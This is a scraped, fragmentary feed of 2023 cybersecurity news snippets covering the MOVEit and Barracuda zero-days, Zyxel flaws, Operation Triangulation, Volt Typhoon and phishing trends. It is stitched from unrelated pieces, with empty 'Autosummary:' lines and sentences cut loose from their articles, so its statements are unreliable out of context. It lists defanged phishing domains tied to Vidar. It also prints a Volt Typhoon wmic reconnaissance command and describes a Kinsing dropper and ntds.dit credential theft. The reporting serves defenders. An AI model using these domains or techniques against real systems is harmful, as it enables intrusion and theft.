Domains believed to be associated with this campaign are: http://bank.verified-docs.org[.]za/ http://chase.sign-docs.org[.]za/ http://documents.cert-docs.net[.]za/ http://documents.verified-docs[.]com/ https://bank.cert-docs.net[.]za https://bank.my-sign-docs[.]com https://bank.sign-documents[.]net.za https://bank.sign-documents[.]org.za https://bank.verified-docs[.]net.za https://bank.verified-docs[.]org.za https://bank.verified-docs[.]site https://chase.cert-docs.co[.]za https://chase.my-sign-docs[.]org https://chase.sign-docs.net[.]za https://chase.sign-docs.org[.]za https://chase.sign-documents.co[.]za https://chase.sign-documents.org[.]za https://documents.cert-docs.co[.]za https://documents.my-sign-docs[.]org https://documents.sign-docs.co[.]za https://documents.verified-docs.org[.]za https://sign-documents.net[.]za/ https://statements.my-sign-docs.net[.]za/ https://statements.sign-docs.co[.]za/ https://statements.sign-documents.co[.]za/ https://statements.sign-documents.net[.]za/ https://statements.sign-documents.org[.]za/ https://statements.verified-docs.org[.]za/ https://verified-docs[.]com/ If the site displays the bank statement, it shows a sample bank statement from Commerce Bank that uses example data, such as the customer name "Jane Customer" at "Anywhere Dr." Phishing email pushing fake bank statement Source: BleepingComputer However, other tests would display a fake Google Drive page that says a preview is unavailable and prompts the user to download the "Bank_statement.pdf". Vidar is an information-stealing trojan that can steal browser cookies, browser history, saved passwords, cryptocurrency wallets, text files, Authy 2FA databases, and screenshots of the active Windows screen. "Autosummary:
"Autosummary:
"As the world’s most powerful military and economic power, the United States also holds another, less impressive distinction: Cyber threat actors target the US more than any other country in the world. In 2022 alone, the FBI received more than 800,000 cybercrime-related complaints, with losses totaling over $10 billion, according to the agency’s latest Internet Crime Complaint Center (IC3) report — a leap of $3.4 billion from the previous year. As cybercriminals grow in sophistication, … More
The post How defense contractors can move from cybersecurity to cyber resilience appeared first on Help Net Security.
"Autosummary:
In 2022 alone, the FBI received more than 800,000 cybercrime-related complaints, with losses totaling over $10 billion, according to the agency’s latest Internet Crime Complaint Center (IC3) report — a leap of $3.4 billion from the previous year.According to the World Economic Forum’s 2023 Global Cybersecurity Outlook, 86% of business leaders and an even higher percentage of cyber leaders, 93%, believe a catastrophic cyber event is likely in the next two years due to global geopolitical instability. "In this Help Net Security video interview, Rick Howard, CSO of N2K, Chief Analyst, and Senior Fellow at the Cyberwire, discusses his book – Cybersecurity First Principles: A Reboot of Strategy and Tactics. In the book, Howard challenges the conventional wisdom of current cybersecurity best practices, strategy, and tactics and makes the case that the profession needs to return to first principles. He lays out the arguments for the absolute cybersecurity first principle and then … More
The post Introducing the book: Cybersecurity First Principles appeared first on Help Net Security.
"Autosummary:
"According to Egress, the evolving attack methodologies currently used by cybercriminals are designed to get through traditional perimeter security. “The evolution of phishing emails continues to pose a major threat to organizations, emphasizing the need to enhance defenses to prevent attacks,” said Jack Chapman, VP of Threat Intelligence, Egress. “Although traditional signature-based detection can filter out phishing emails with known malicious payloads (attachments and links), cybercriminals are constantly refining their attack methods to bypass existing … More
The post Cybercriminals use legitimate websites to obfuscate malicious payloads appeared first on Help Net Security.
"Autosummary:
Amongst the sites leveraged by hackers and detected by Egress Defend, YouTube, Amazon AWS, Google Docs, Firebase Storage, and DocuSign emerged as the top 10 most frequently used, with a 121% rise in this method observed between January 1 and April 30, 2023, compared to September to December 2022. "Autosummary:
The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "Autosummary:
" Patches for the bug have been made available by the Massachusetts-based company, which also owns Telerik, in the following versions: 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1). "Autosummary:
"There’s new information about the zero-day vulnerability in Progress Software’s MOVEit Transfer solution exploited by attackers and – more importantly – patches and helpful instructions for customers. The MOVEit Transfer zero-day and updated mitigation and remediation advice Progress Software has updated the security advisory and confirmed that the vulnerability (still without a CVE number) is a SQL injection vulnerability in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access … More
The post MOVEit Transfer zero-day attacks: The latest info appeared first on Help Net Security.
"Autosummary:
The advisory also contains links to fixed versions, indicators of compromise (IoCs) – scripts, webshells, C2 IP addresses, user accounts – and more extensive clean-up advice, which includes: Disabling all HTTP and HTTPs traffic to the MOVEit Transfer environment Deleting unauthorized files and user accounts and resetting credentials Applying the patch/updating the installation to a fixed version Enabling all HTTP and HTTPs traffic to the MOVEit Transfer environment Checking that the files have been successfully deleted and no unauthorized accounts remain – if they haven’t been, do the clean-up and reset the service account credentials again If the clean-up has been successful, organizations should monitor network, endpoints, and logs for IoCs Researchers from Huntress, TrustedSec, and Rapid7 have analyzed the webshell/backdoor, released YARA signatures and SIGMA rules defenders can use to detect IoCs and hunt for suspicious files, and have shared more technical information about the attacks. "Qakbot (aka Qbot) – banking malware-turned-malware/ransomware distribution network – has been first observed in 2007 and is active to this day. The neverending adaptability of this threat is key to its long-term survival and success. “Qakbot operators tend to reduce or stop their spamming attacks for long periods of time on a seasonal basis, returning to activity with a modified suite of tools,” Chris Formosa and Steve Rudd, researchers with Lumen’s Black Lotus Labs, have … More
The post Qakbot: The trojan that just won’t go away appeared first on Help Net Security.
"Autosummary:
"Digi International has released the latest version of Digi SkyCloud, a solution for monitoring, analyzing and controlling field data. The 23.5 update of SkyCloud introduces a range of new features, giving users effortless systems integrations with remote monitoring and control solutions — delivering flexibility and optimal efficiency, making it ideal for industrial, agricultural and environmental industries. Company administrators can now better manage their deployment and user base. At the forefront of this release are the … More
The post Digi International updates SkyCloud features for industrial monitoring and control solutions appeared first on Help Net Security.
"Autosummary:
"Google has tripled the full reward amount for the first security bug report that includes a functional full chain exploit of its popular Chrome browser. Six months of higher rewards for a Chrome full chain exploit The Chrome Vulnerability Rewards Program, which started on June 1, is set to run until December 1, 2023. During this period, bug hunters who report security bugs that can be chained together to fully exploit Chrome can get up … More
The post Google triples reward for Chrome full chain exploits appeared first on Help Net Security.
"Autosummary:
"Galvanick announced its $10 million seed round. Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. Galvanick plans to use the capital to make additional core hires, and expand use of its initial product – a Extended Detection & Response (XDR) platform – to additional advanced manufacturing and critical infrastructure facilities. Galvanick … More
The post Galvanick raises $10 million for its industrial cybersecurity platform appeared first on Help Net Security.
"Autosummary:
Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. "Autosummary:
The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. "Threat actors are exploiting a zero-day flaw in Progress Software’s MOVEit Transfer product to steal data from organizations. Threat actors are actively exploiting a zero-day vulnerability in the Progress MOVEit Transfer file transfer product to steal data from organizations. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files […]
The post MOVEit Transfer software zero-day actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, MOVEit Transfer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
While its headquarters are in Burlington, Vermont, Burton also maintains offices in various locations, including Australia, Austria, Canada, California, China, and Japan. "After the recent ransomware attack, Point32Health disclosed a data breach that impacted 2.5 million Harvard Pilgrim Health Care subscribers. In April, the non-profit health insurer Point32Health took systems offline in response to a ransomware attack that took place on April 17. The insurer immediately launched an investigation into the incident with the help of third-party […]
The post Point32Health ransomware attack exposed info of 2.5M people appeared first on Security Affairs.
"Autosummary:
Stolen data include names, addresses, phone numbers, birth dates, Social Security numbers, health insurance account information, taxpayer identification numbers, and clinical information, including medical history, diagnoses, and treatment details. "Autosummary:
We also learned about some previous ransomware attacks, including @Seifreed, @billtoulas, @Ionut_Ilascu, @struppigel, @BleepinComputer, @serghei, @LawrenceAbrams, @malwrhunterteam, @demonslay335, @fwosar, @rapid7, @HuntressLabs, @GossiTheDog, @IBMSecurity, @TrendMicro, @Avast, @jgreigj, and @pcrisk. May 30th 2023 BlackCat ransomware, which was among the top ransomware families observed by IBM Security X-Force in 2022, according to the 2023 X-Force Threat Intelligence Index, continues to wreak havoc across organizations globally this year. "US CISA added actively exploited Progress MOVEit Transfer zero-day vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a Progress MOVEit Transfer SQL injection vulnerability, tracked as CVE-2023-34362, to its Known Exploited Vulnerabilities Catalog. Threat actors are actively exploiting a zero-day vulnerability in the Progress MOVEit Transfer file transfer product […]
The post CISA adds Progress MOVEit Transfer zero-day to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Exploits and vulnerabilities Categories: News Tags: Progress Tags: MOVEit Tags: vulnerability Tags: human2.aspx A critical vulnerability in Progress MOVEit Transfer is being used to steal large amounts of data |
The post Update now! MOVEit Transfer vulnerability actively exploited appeared first on Malwarebytes Labs.
"Autosummary:
It is important to note, that until HTTP and HTTPS traffic is enabled again: Users will not be able to log on to the MOVEit Transfer web UI MOVEit Automation tasks that use the native MOVEit Transfer host will not work REST, Java and .NET APIs will not work MOVEit Transfer add-in for Outlook will not work SFTP and FTP/s protocols will continue to work as normal Administrators will still be able to access MOVEit Transfer by using a remote desktop to access the Windows machine and then accessing https://localhost/. 2.This allows the attacker to obtain a list of all folders, files, and users within MOVEit, download any file within MOVEit, and insert an administrative backdoor user into, giving attackers an active session to allow credential bypass The Cybersecurity and Infrastructure Agency (CISA) is urging users and organizations to review the MOVEit Transfer Advisory, follow the mitigation steps, apply the necessary updates, and hunt for any malicious activity. "The cloud is the future of enterprise architecture. It’s economical (to a degree), it’s scalable, it’s flexible and – best of all – it’s someone else’s responsibility. Again, to a point. That’s because the cloud comes with its own set of security and governance challenges. 1. Controlling the sprawl An average employee uses about 36 cloud-based services daily, while enterprises store about 60% of their data on the cloud. Controlling this sudden, often unintended explosion … More
The post Why organizations should adopt a cloud cybersecurity framework appeared first on Help Net Security.
"Autosummary:
Every CSP will implement security differently and every cloud model (software-as-a-service, infrastructure-as-a-service, platform-as-a-service, etc.) will have varying degrees of security control ownership, which is why it might be difficult for them to meet all security requirements. There are a number of different cloud cybersecurity control frameworks available, including the Cloud Controls Matrix (CCM) proposed by the Cloud Security Alliance, the Information Security Forum’s Standard of Good Practice (SOGP), the National Institute of Standards and Technology (NIST) Cybersecurity Framework, and the ISO/IEC 27002.They help organizations maintain a record of cloud services, their usage, security controls and capabilities across on-premises, off-premises, private and public cloud. "In this Help Net Security interview, Jay Chaudhry, CEO at Zscaler, talks about connecting and securing remote employees and their devices to access organizational resources from any location. He discusses the potential risks of remote VPN access, the increasing reliance on personal devices, and transitioning to a cloud-first model. We’ll examine the impact of the shifting role of data centers on network strategies, the implementation of a zero-trust security framework, and how 5G networks might … More
The post Navigating cybersecurity in the age of remote work appeared first on Help Net Security.
"Autosummary:
In today’s hybrid world, your data is often sitting in public clouds like Azure and AWS, in SaaS applications, in data centers, factories, and on your endpoints. We’ll examine the impact of the shifting role of data centers on network strategies, the implementation of a zero-trust security framework, and how 5G networks might further decentralize workplaces How should CISOs manage the security concerns of employees working remotely and using personal devices to access organizational resources? This works well for employees, but if someone steals an employee’s VPN login credentials, they can get on the corporate network, move laterally to find high-value assets and launch a ransomware attack or exfiltrate data. "Ransomware has become an ever-present threat to individuals, businesses, and even entire nations. In this Help Net Security round-up, we present parts of previously recorded videos from experts in the field that shed light on the pressing ransomware issues. Complete videos David Mahdi, Chief Strategy Officer & CISO Advisory at Sectigo, talks about how ransomware isn’t solely a malware problem, bad actors want access to your data, so it really is a data security and … More
The post Fighting ransomware: Perspectives from cybersecurity professionals appeared first on Help Net Security.
"Autosummary:
"A 25% increase in the use of phishing kits has been recorded in 2022, according to Group-IB. The key phishing trends observed are the increasing use of access control and advanced detection evasion techniques. The rise in evasive tactics, such as antibot techniques and randomization, poses a significant challenge for conventional detection systems and extends the lifespan of phishing campaigns. 3,677 unique phishing kits in 2022 have been identified, 25% more than in 2021. A … More
The post Phishing campaigns thrive as evasive tactics outsmart conventional detection appeared first on Help Net Security.
"Autosummary:
For example, in 2022, approximately 1,500 phishing kits contained the functionality for transferring stolen data either via Telegram, email or by writing the data to a file locally on the server, which indicates their growing sophistication. Notably, in 2022, Group-IB researchers observed a 40% increase in the use of anti-bot technologies designed to prevent automated cybersecurity scanners from identifying phishing content. "Autosummary:
VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36), and ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1) The Shadowserver Foundation, in a recent tweet, said the flaw is "being actively exploited to build a Mirai-like botnet" since May 26, 2023. "Autosummary:
Sphynx also incorporates a loader to decrypt the ransomware payload that, upon execution, performs network discovery activities to hunt for additional systems, deletes volume shadow copies, encrypts files, and finally drops the ransom note. "Autosummary:
"Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts Zyxel firewalls. Their objective is to leverage this vulnerability to deploy and install malware on the affected systems.US CISA added the […]
The post Widespread exploitation by botnet operators of Zyxel firewall flaw appeared first on Security Affairs.
"Autosummary:
May 27, 2023 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Zyxel) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The stolen files include the following types of sensitive information: Full names Physical addresses Phone numbers Dates of birth Health insurance account information Social Security numbers Provider taxpayer identification numbers Clinical information, including medical history, diagnoses, treatment, dates of service, and provider names The organization has clarified that the incident impacts current and former members of Harvard Pilgrim, who had a registration date starting on March 28, 2012. "Autosummary:
In August, the company also announced that it would pay for bugs reported in the latest released versions of Google open-source software, including projects like Bazel, Angular, Golang, Protocol buffers, and Fuchsia. "Autosummary:
Webshell installed by exploit on MOVEit Transfer Servers Source: BleepingComputer From analysis by BleepingComputer, when the webshell is accessed and the correct password supplied, the script will execute various commands based on the value of the " X-siLock-Step1 ", " X-siLock-Step1" , and " X-siLock-Step3" request headers. According to Progress, MOVEit Transfer is used by thousands of enterprises, including Chase, Disney, GEICO, and MLB, as well as 1,700 software companies and 3.5 million developers. "Autosummary:
"Secureworks has launched two new offerings to unify the way industrial organizations prevent, detect, and respond to threats across the OT and IT landscapes. The convergence of OT and IT in the industrial sector brings technological and economic benefits, but also increases risk. The more OT systems are digitally connected, the larger the overall attack surface becomes, making OT an increasingly attractive target for threat actors. This, combined with a global cybersecurity talent shortage numbering … More
The post Secureworks strengthens industrial cybersecurity with two new offerings appeared first on Help Net Security.
"Autosummary:
The solution includes: 24×7 threat monitoring with unlimited access to security experts in 90 seconds or less, collaborative design of OT and IT response processes, customizable rules and playbooks, quarterly expert security reviews, monthly threat hunting, onboarding support, and access to proactive services (including incident response planning and adversarial testing).Their risks include unplanned shutdowns, financial losses, and harm to human populations that rely on critical services,” said Kyle Falkenhagen, CPO, Secureworks. "Nozomi Networks and Cynalytica have unveiled they have partnered to provide a visibility, monitoring and threat detection solution that encompasses both TCP/IP-based and non-IP based serial bus and analog connections found in OT and IoT environments. The joint solution simplifies the challenge of addressing security across modernized and legacy systems, and converges security monitoring across an unlimited number of facilities and systems to a central location. “The current cybersecurity challenges and gaps faced by ICS/SCADA … More
The post Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments appeared first on Help Net Security.
"Autosummary:
"A critical zero-day vulnerability in Progress Software’s enterprise managed file transfer solution MOVEit Transfer is being exploited by attackers to grab corporate data. “[The vulnerability] could lead to escalated privileges and potential unauthorized access to the environment,” the company warned on Wednesday, and advised customers to take action to protect their MOVEit Transfer environment, “while our team produces a patch.” The alert also tells them to check for indicators of unauthorized access over at least … More
The post Critical zero-day vulnerability in MOVEit Transfer exploited by attackers! appeared first on Help Net Security.
"Autosummary:
Progress Software advised users to temporarily disable all HTTP and HTTPS traffic to their MOVEit Transfer environment, and to upgrade to one of the fixed versions: MOVEit Transfer 2023.0.1 MOVEit Transfer 2022.1.5 MOVEit Transfer 2022.0.4 MOVEit Transfer 2021.1.4 MOVEit Transfer 2021.0.6 They also advised customers to check whether unexpected files have been created in the c:\MOVEit Transfer\wwwroot\ folder on all their MOVEit Transfer instances, and whether unexpected or large file downloads have been performed. "Autosummary:
"This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. "Autosummary:
"The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said. "Autosummary:
"Categories: News Categories: Ransomware Tags: Idaho Tags: hospital Tags: cyberattack Tags: virus Tags: ransomware The Idaho Falls Community Hospital fell victim to a cyberattack on Monday and had to divert ambulances to nearby hospitals and close some of its clinics. |
The post US hospital forced to divert ambulances after cyberattack appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. While the exact nature of the cyberattack is unknown at this point and the hospital calls it a “virus”, it is more likely that it is dealing with a ransomware attack. "A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. The experts uncovered the attack while monitoring […]
The post Operation Triangulation: previously undetected malware targets iOS devices appeared first on Security Affairs.
"Autosummary:
Kaspersky provided the list of C2 domains involved in the attack, at least two of them currently show the following banner: About the author: Jurgita Lapienytė, Chief Editor at CyberNews Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Operation Triangulation) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "In this Help Net Security video, Jason Lewkowicz, Chief Services Officer at Optiv, discusses mental health in cybersecurity, which needs more attention. There is a confluence of factors – from the cybersecurity talent shortage and reductions in force to volatile financial markets and stagnant budgets – forcing cybersecurity professionals at all levels to work beyond their standard capacity on any given day, leading to emotional stress and burnout. Add a cyber incident to the mix, … More
The post Managing mental health in cybersecurity appeared first on Help Net Security.
"Autosummary:
"Protecting operational technology (OT) systems is now more critical than ever as more organizations connect their OT environments to the internet, according to Fortinet. Although IT/OT convergence has many benefits, it is being hampered and handicapped by advanced and destructive cyberthreats. The spillover of these attacks is increasingly targeted at OT environments. “Fortinet’s report shows that while OT organizations have improved their overall cybersecurity posture, they also have continued opportunity for improvement. Networking and IT … More
The post Organizations are placing OT cybersecurity responsibility on CISOs appeared first on Help Net Security.
"Autosummary:
Intrusions from malware (56%) and phishing (49%) were once again the most common type of incidents reported, and nearly one-third of respondents reported being victims of a ransomware attack in the last year (32%, unchanged from 2022). In 2023, the number of respondents who consider their organization’s OT security posture as “highly mature” fell to 13% from 21% the year before, suggesting growing awareness among OT professionals and more effective tools for self-assessing their organizations’ cybersecurity capabilities. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), last week, also added the bug to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023. "Autosummary:
"Apple fixed a vulnerability discovered by Microsoft researchers that lets attackers with root privileges bypass System Integrity Protection (SIP). Researchers from Microsoft discovered a vulnerability, tracked as CVE-2023-32369 and dubbed Migraine, that can allow attackers with root privileges to bypass System Integrity Protection (SIP). System Integrity Protection (also referred to as rootless) is a macOS security feature […]
The post Microsoft found a new bug that allows bypassing SIP root restrictions in macOS appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, macOS) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Below is a video PoC that shows the exploitation of the flaw: https://www.microsoft.com/en-us/videoplayer/embed/RW14MaR The consequences of arbitrary bypasses of System Integrity Protection (SIP) could be very dangerous, malware developers can exploit it to: Create undeletable malware: Attackers can create files with the “com.apple.rootless” extended attribute or overwrite existing files with it. "ConnectSecure is adding deep attack surface scanning and the Exploit Prediction Scoring System (EPSS) to its cybersecurity platform for managed service providers (MSPs) that protect small and midsize businesses. The new capabilities will be fully integrated into the ConnectSecure platform, giving MSPs complete visibility into network, device, and application weaknesses that can be exploited by bad actors. While ConnectSecure regularly enhances its cybersecurity platform in response to its MSP partner community feedback, attack surface scanning … More
The post ConnectSecure enhances its cybersecurity platform with deep attack surface scanning and EPSS appeared first on Help Net Security.
"Autosummary:
Specifically, ConnectSecure’s attack surface scanner will scan and identify: Open ports Targeted IP addresses Compromised emails Weak or compromised usernames Suspicious subdomains EPSS provides a dynamic, real-time score that rates software vulnerabilities based on real-world activity to determine the probability they will be exploited. "Zyxel has patched a high-severity authenticated command injection vulnerability (CVE-2023-27988) in some of its network attached storage (NAS) devices aimed at home users. About the vulnerability (CVE-2023-27988) The vulnerability was discovered in the devices’ web management interface. “An authenticated attacker with administrator privileges could leverage this vulnerability to execute some operating system (OS) commands on an affected device remotely,” Zyxel has confirmed. The following versions of the Zyxel NAS devices are affected: NAS326 version 5.21(AAZF.12)C0 … More
The post Zyxel patches vulnerability in NAS devices (CVE-2023-27988) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Migraine is the latest addition to the list of macOS security bypasses that have been documented under the names Shrootless (CVE-2021-30892, CVSS score: 5.5), powerdir (CVE-2021-30970, CVSS score: 5.5), and Achilles (CVE-2022-42821, CVSS score: 5.5). "Recently disclosed zero-day flaw in Barracusa Email Security Gateway (ESG) appliances had been actively exploited by attackers since October 2022. The network security solutions provider Barracuda recently warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability. The vulnerability, tracked as CVE-2023-2868, resides […]
The post Threat actors are exploiting Barracuda Email Security Gateway bug since October 2022 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Barracuda) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnRotate any applicable credentials connected to the ESG appliance: o Any connected LDAP/AD o Barracuda Cloud Control o FTP Server o SMB o Any private TLS certificates Review your network logs for any of the IOCs listed below and any unknown IPs. "A misconfiguration of Swiss real estate agency Neho’s systems exposed sensitive credentials to the public. Neho, a Switzerland-based real estate agency, leaked credentials recently, potentially allowing threat actors to prey on sensitive data about the company and its clients. The Cybernews research team discovered a misconfiguration in the Neho.ch website that exposed sensitive credentials to […]
The post Swiss real estate agency Neho fails to put a password on its systems appeared first on Security Affairs.
"Autosummary:
Credentials leaked included: PostgreSQL database host, port, name, and password Redis database host, port, and password Mailgun host, username, and password Postmark API and SMTP credentials AWS Bucket access key ID and secret Twilio Account credentials Aircall API and tokens Elastic search AWS credentials Google Client ID and Secret Facebook Client ID and secret Trustpilot API key and secret Pricehubble credentials Movu.ch token Canny ID, keys and tokens TravelTime API Corporate communication channels at risk Another piece of sensitive information observed was the application programming interface (API) and Simple Mail Transfer Protocol (SMTP) credentials for Postmark email-sending services. Give a look at the original post at https://cybernews.com/security/neho-real-estate-agency-data-leak/ About the author: Paulina Okunytė, Journalist at CyberNews Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Neho) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On A number of less critical credentials were also exposed, including Pricehubble credentials, Movu.ch token, Canny ID, keys and tokens, and TravelTime API. "Autosummary:
"Autosummary:
Its latest version, 1.41, features reverse proxy, remote shell, remote desktop, TLS communication, and a file management system, and is freely available through GitHub. "Autosummary:
This includes webpages, databases, APIs, and other server-side components, network mapping, service identification, and fingerprinting. The Seven Stages of Penetration Testing There are seven main stages of a complex pen testing process that must be followed in order to effectively assess an application’s security posture: Pre-engagement: Before beginning the actual pen testing process, it is important to properly prepare the environment and define objectives.Pen testers collect information about the target application, including architecture, technologies used, potential entry points, and user roles. With Outpost24"s PTaaS, organizations can benefit from continuous security monitoring, proactive vulnerability detection, and streamlined remediation processes.By providing one-click fixes for common issues, PTaaS simplifies the remediation process, enabling developers to quickly address vulnerabilities without extensive security expertise. "Autosummary:
These tools include "AccCheckConsole.exe," "remote.exe," "Extexport.exe," "MSPUB.exe," and "MSOHTMED.exe," which can be exploited for proxy execution, downloading additional payloads, and more. "Autosummary:
" A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server. "Autosummary:
" "However, the irony of a highly insecure update application, backed into firmware to automatically download and run a payload, is not lost." "Autosummary:
The presented PoC retrieves the built-in "type" function that helps create a new class named "Word," which inherits from the "str" class, which can bypass safety checks and give access to sensitive attributes like "code." "Categories: Business Tags: one-man Tags: financial Tags: loans Tags: cyber Tags: lapses Tags: security Tags: update Tags: New York Tags: lapse We take a look at a fine totalling millions aimed at financial services company OneMain. |
The post Financial services company OneMain fined $4.25 million for security lapses appeared first on Malwarebytes Labs.
"Autosummary:
OneMain failed to effectively manage third-party service provider risk, manage access privileges, and maintain a formal application security development methodology, significantly increasing the company’s vulnerability to cybersecurity events.We go once more to the release: OneMain did not conduct timely due diligence for certain high- and medium-risk vendors, despite the existence of a third-party vendor management policy requiring that each vendor undergo an assessment to determine the vendor’s risk rating and the appropriate level of due diligence OneMain should perform on the vendor. "Categories: Business US businesses: watch out for Volt Typhoon, a threat actor sponsored by the People’s Republic of China (PRC). |
The post CISA issues warning to US businesses: Beware of China"s state-sponsored cyber actor appeared first on Malwarebytes Labs.
"Autosummary:
Likewise, CISAs advice to businesses emphasizes the importance of enhancing detection of potential LOTL attacks through robust logging mechanisms, inspecting abnormal account activities, and more: CISA Advice Description Enhance monitoring and logging Use advanced monitoring systems to track unusual IP addresses, abnormal account activity, and suspicious process creations. cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename" LOTL Example #2: Credential Access Volt Typhoon attempts to capture two vital assets from Windows Domain Controllers (DCs): the ntds.dit file and the SYSTEM registry hive.Their victims come from a wide-range of industries, including communications, government, information technology (IT), education, and more. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Mark Stockley – @markstockley Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
"API calls make up the majority of our digital lives. Take, for example, the everyday use of a cloud-based food delivery app, which could involve up to 25 API calls. Between the order being placed, transmission to the restaurant, the coordination of delivery, and the processing of payments, this multi-party transaction includes at least four third-party providers, and a high volume of sensitive data shared between them. The top two highest-impact breach vectors for API … More
The post The root causes of API incidents and data breaches appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The malware is capable of tracking device location, recording the microphone, retrieving contact lists, accessing call, SMS, clipboard, and notification logs, viewing installed applications, downloading and uploading files, viewing connectivity status, and executing additional commands from the C2 server," researcher Jared Wilson said. "Autosummary:
"CAPTCHAs are common tools used to prevent spam and bot abuse, but the increasing use of CAPTCHA-breaking services has made CAPTCHAs less effective," Costoya said. "Autosummary:
Created by security researchers, government agencies, and other groups that monitor the security landscape, this data is a crucial instrument in the battle against cyber attacks, as they provide the latest information on the most recent threats and vulnerabilities, threat actors" strategies, methodologies, and processes, as well as indicators of compromise (IOCs) that may be utilized to identify and prevent assaults. Implement automation Implementing automation in your vulnerability management is a critical step in maintaining a sound security posture: automation can be used to detect and prioritize threats, apply patches or software upgrades, alert specialists and keep an audit trail - minimizing the time and effort spent, as businesses must act promptly to mitigate the likelihood of exploitation. Threat intelligence feeds A threat intelligence feed is a data stream that provides information on the latest cyber threats and attacks, including vulnerabilities, malware, phishing, and other malicious activities.Patch management solutions, such as Action1, can search an organization"s environment for missing patches, rank them based on their criticality, and automatically deploy them to impacted systems based on patch deployment policies. "“file archiver in the browser” is a new phishing technique that can be exploited by phishers when victims visit a .ZIP domain. A new phishing technique called “file archiver in the browser” can be used by phishers to “emulate” a file archiver software in a web browser when a victim visits a .ZIP domain. The […]
The post Beware of the new phishing technique “file archiver in the browser” that exploits zip domains appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, phishing) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Barracuda says that the recently discovered compromise of some of it clients’ ESG appliances via a zero-day vulnerability (CVE-2023-2868) resulted in the deployment of three types of malware and data exfiltration. The company did not say how many organizations have been breached, but has comfirmed that the “earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.” Zeor-day exploited, Barracuda ESG appliances backdoored On May 23, Barracuda Networks publicly acknowledged that attackers have been … More
The post Attackers hacked Barracuda ESG appliances via zero-day since October 2022 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Customers are advised to check if their ESG appliances are up-to-date, stop using breached appliances and request a new virtual or hardware appliance, rotate all credentials linked to hacked appliances, and check their network logs for IOCs shared today and for connections from unknown IPs. "Autosummary:
